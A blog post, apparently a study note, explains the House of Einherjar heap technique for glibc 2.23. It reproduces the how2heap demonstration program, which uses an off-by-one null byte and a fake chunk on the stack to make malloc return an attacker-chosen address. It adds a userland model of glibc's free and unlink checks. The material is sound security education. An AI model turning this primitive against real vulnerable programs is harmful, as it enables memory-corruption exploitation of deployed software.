how2heap-2.23-15-house_of_einherjar

2024-01-08 20:52


After working through how2heap-2.23-07-unsafe_unlink and then how2heap-2.23-11-poison_null_byte, I wanted to set up an exploit using the chunk above the chunk hit by the poison null byte; it turns out the technique I had in mind was exactly this house_of_einherjar.

In the how2heap example the fake chunk that the freed chunk will be consolidated with is placed on the stack, and the heap is laid out so that after consolidation the fake chunk becomes the top chunk; the underlying principle is the same. The single off-by-one null byte written past 'a' only clears the PREV_INUSE bit of 'b' (0x101 becomes 0x100) and leaves its size alone, which is why 'b' is sized so that its chunk size is a multiple of 0x100. The prev_size field of 'b' is the last 8 bytes of the usable region of 'a', so it can be set to the distance from the fake chunk to 'b'; free(b) then consolidates backward into the fake chunk, passes the glibc 2.23 unlink() checks because all four list pointers of the fake chunk point to itself, and finally merges forward with the top chunk, making the fake chunk the new top. Computing that distance requires knowing both addresses, hence the heap-leak requirement mentioned in the how2heap comment. On glibc 2.26 and later the freed 0x100-byte chunk would land in tcache instead of being consolidated, so the tcache bin for that size has to be filled first before this layout works.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
   Credit to st4g3r for publishing this technique
   The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
   This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	printf("Welcome to House of Einherjar!\n");
	printf("Tested in Ubuntu 16.04 64bit.\n");
	printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

	uint8_t* a;
	uint8_t* b;
	uint8_t* d;

	printf("\nWe allocate 0x38 bytes for 'a'\n");
	a = (uint8_t*) malloc(0x38);
	printf("a: %p\n", a);

	int real_a_size = malloc_usable_size(a);
	printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

	// create a fake chunk
	printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
	printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
	printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
	printf("(although we could do the unsafe unlink technique here in some scenarios)\n");

	size_t fake_chunk[6];

	fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
	fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
	fake_chunk[2] = (size_t) fake_chunk; // fwd
	fake_chunk[3] = (size_t) fake_chunk; // bck
	fake_chunk[4] = (size_t) fake_chunk; // fwd_nextsize
	fake_chunk[5] = (size_t) fake_chunk; // bck_nextsize

	printf("Our fake chunk at %p looks like:\n", fake_chunk);
	printf("prev_size (not used): %#lx\n", fake_chunk[0]);
	printf("size: %#lx\n", fake_chunk[1]);
	printf("fwd: %#lx\n", fake_chunk[2]);
	printf("bck: %#lx\n", fake_chunk[3]);
	printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
	printf("bck_nextsize: %#lx\n", fake_chunk[5]);

	/* In this case it is easier if the chunk size attribute has a least significant byte with
	 * a value of 0x00. The least significant byte of this will be 0x00, because the size of
	 * the chunk includes the amount requested plus some amount required for the metadata.
	 */
	b = (uint8_t*) malloc(0xf8);
	int real_b_size = malloc_usable_size(b);

	printf("\nWe allocate 0xf8 bytes for 'b'.\n");
	printf("b: %p\n", b);

	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
	/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit */

	printf("\nb.size: %#lx\n", *b_size_ptr);
	printf("b.size is: (0x100) | prev_inuse = 0x101\n");
	printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
	a[real_a_size] = 0;   // off-by-one: a[0x38] is the lowest byte of b's size field
	printf("b.size: %#lx\n", *b_size_ptr);
	printf("This is easiest if b.size is a multiple of 0x100 so you "
	       "don't change the size of b, only its prev_inuse bit\n");
	printf("If it had been modified, we would need a fake chunk inside "
	       "b where it will try to consolidate the next chunk\n");

	// Write a fake prev_size to the end of a
	printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
	       "it will consolidate with our fake chunk\n", sizeof(size_t));
	size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
	printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
	*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;   // this is b's prev_size field

	// Change the fake chunk's size to reflect b's new prev_size
	printf("\nModify fake chunk's size to reflect b's new prev_size\n");
	fake_chunk[1] = fake_size;

	// free b and it will consolidate with our fake chunk
	printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
	free(b);
	printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

	// if we allocate another chunk before we free b we will need to
	// do two things:
	// 1) We will need to adjust the size of our fake chunk so that
	//    fake_chunk + fake_chunk's size points to an area we control
	// 2) we will need to write the size of our fake chunk
	//    at the location we control.
	// After doing these two things, when unlink gets called, our fake chunk will
	// pass the size(P) == prev_size(next_chunk(P)) test.
	// otherwise we need to make sure that our fake chunk is up against the
	// wilderness

	printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
	d = malloc(0x200);
	printf("Next malloc(0x200) is at %p\n", d);

	(void) real_b_size;
	return 0;
}
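The how2heap program above only behaves as described on a real glibc 2.23 heap. To make the control flow visible independently of the libc you happen to have, the following is an added example (not part of how2heap or of the original post): it models the relevant pieces of glibc 2.23's _int_free() and unlink() in userland over a constructed buffer, with chunk 'a' (0x40), chunk 'b' (0x100) and top laid out at fixed offsets and the fake chunk placed at a lower offset in the same buffer standing in for the stack. The offsets, the chunk_t struct, and the function names unlink_2_23, model_free, setup_layout and size_vs_prev_size_ok are all assumptions of this model; the check names in the comments are the glibc abort messages they mirror. The model also carries the `size(P) == prev_size(next_chunk(P))` check that later glibc versions added to unlink(), to show why fake_chunk[1] is set to the fake prev_size.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PREV_INUSE     0x1UL
#define SIZE_BITS      0x7UL
#define MIN_LARGE_SIZE 0x400UL  /* 64-bit glibc: chunks below this are "small" */

/* Constructed layout (assumption of this model): fake chunk low in the buffer
 * ("stack"), then chunk a (0x40), chunk b (0x100) and top higher up ("heap"). */
#define FAKE_OFF 0x100
#define A_OFF    0x800
#define B_OFF    (A_OFF + 0x40)
#define TOP_OFF  (B_OFF + 0x100)
#define TOP_SIZE 0x1000UL

typedef struct {
    size_t prev_size, size;
    size_t fd, bk, fd_nextsize, bk_nextsize;
} chunk_t;

static size_t mem[0x400];  /* 0x2000 bytes, naturally aligned like an arena */

static size_t chunksize(const chunk_t *p) { return p->size & ~SIZE_BITS; }
static chunk_t *chunk_at_offset(chunk_t *p, ptrdiff_t off) { return (chunk_t *)((uint8_t *)p + off); }
static chunk_t *fake_addr(void) { return (chunk_t *)((uint8_t *)mem + FAKE_OFF); }

/* glibc 2.23 unlink(): 0 on success, 1 = "corrupted double-linked list",
 * 2 = "corrupted double-linked list (not small)". */
static int unlink_2_23(chunk_t *p) {
    chunk_t *fd = (chunk_t *)p->fd, *bk = (chunk_t *)p->bk;
    if (fd->bk != (size_t)p || bk->fd != (size_t)p) return 1;
    fd->bk = (size_t)bk;
    bk->fd = (size_t)fd;
    if (chunksize(p) >= MIN_LARGE_SIZE && p->fd_nextsize != 0) {
        chunk_t *fdn = (chunk_t *)p->fd_nextsize, *bkn = (chunk_t *)p->bk_nextsize;
        if (fdn->bk_nextsize != (size_t)p || bkn->fd_nextsize != (size_t)p) return 2;
    }
    return 0;
}

/* Check added to unlink() in later glibc: "corrupted size vs. prev_size". */
static int size_vs_prev_size_ok(chunk_t *p) {
    chunk_t *next = chunk_at_offset(p, (ptrdiff_t)chunksize(p));
    return chunksize(p) == next->prev_size;
}

/* Build the House of Einherjar layout; returns chunk b. With apply_null_byte == 0
 * the prev_size is still planted but b's PREV_INUSE bit stays set. */
static chunk_t *setup_layout(int apply_null_byte) {
    memset(mem, 0, sizeof mem);
    uint8_t *base = (uint8_t *)mem;
    chunk_t *a = (chunk_t *)(base + A_OFF);
    chunk_t *b = (chunk_t *)(base + B_OFF);
    chunk_t *top = (chunk_t *)(base + TOP_OFF);
    a->size = 0x40 | PREV_INUSE;   /* what malloc(0x38) produces */
    b->size = 0x100 | PREV_INUSE;  /* what malloc(0xf8) produces */
    top->size = TOP_SIZE | PREV_INUSE;

    chunk_t *fake = fake_addr();
    /* In the real attack this distance is what the heap (and stack) leak provides. */
    size_t fake_size = (size_t)((uint8_t *)b - (uint8_t *)fake);
    fake->fd = fake->bk = fake->fd_nextsize = fake->bk_nextsize = (size_t)fake;
    fake->size = fake_size;  /* so next_chunk(fake) == b and the size/prev_size pair agrees */

    uint8_t *a_mem = (uint8_t *)a + 2 * sizeof(size_t);
    size_t real_a_size = chunksize(a) - sizeof(size_t);        /* 0x38, covers b->prev_size */
    if (apply_null_byte) a_mem[real_a_size] = 0;               /* b->size: 0x101 -> 0x100 */
    memcpy(&a_mem[real_a_size - sizeof(size_t)], &fake_size, sizeof fake_size); /* b->prev_size */
    return b;
}

/* Non-fastbin path of glibc 2.23 _int_free() for a chunk whose neighbour is top.
 * Returns the chunk that becomes the new top, or NULL if a check would abort. */
static chunk_t *model_free(chunk_t *p) {
    size_t size = chunksize(p);
    chunk_t *next = chunk_at_offset(p, (ptrdiff_t)size);
    if (!(next->size & PREV_INUSE)) return NULL;  /* "double free or corruption (!prev)" */
    if (!(p->size & PREV_INUSE)) {                /* backward consolidation */
        size_t prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -(ptrdiff_t)prevsize);
        if (unlink_2_23(p) != 0) return NULL;
    }
    size += chunksize(next);                      /* forward merge with top */
    p->size = size | PREV_INUSE;
    return p;
}

int main(void) {
    chunk_t *b = setup_layout(1);
    printf("fake chunk %p, b %p, fake prev_size %#zx\n", (void *)fake_addr(), (void *)b, chunksize(fake_addr()));
    chunk_t *top = model_free(b);
    printf("new top %p (%s), size %#zx\n", (void *)top,
           top == fake_addr() ? "the fake chunk" : "not the fake chunk", top ? chunksize(top) : 0);
    return 0;
}
```

Running the model with the null byte applied makes the fake chunk the new top with size 0x740 + 0x100 + 0x1000; without the null byte the planted prev_size is ignored and b simply merges into top, which is the whole point of the off-by-one.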




http://www.chinasem.cn/article/584794
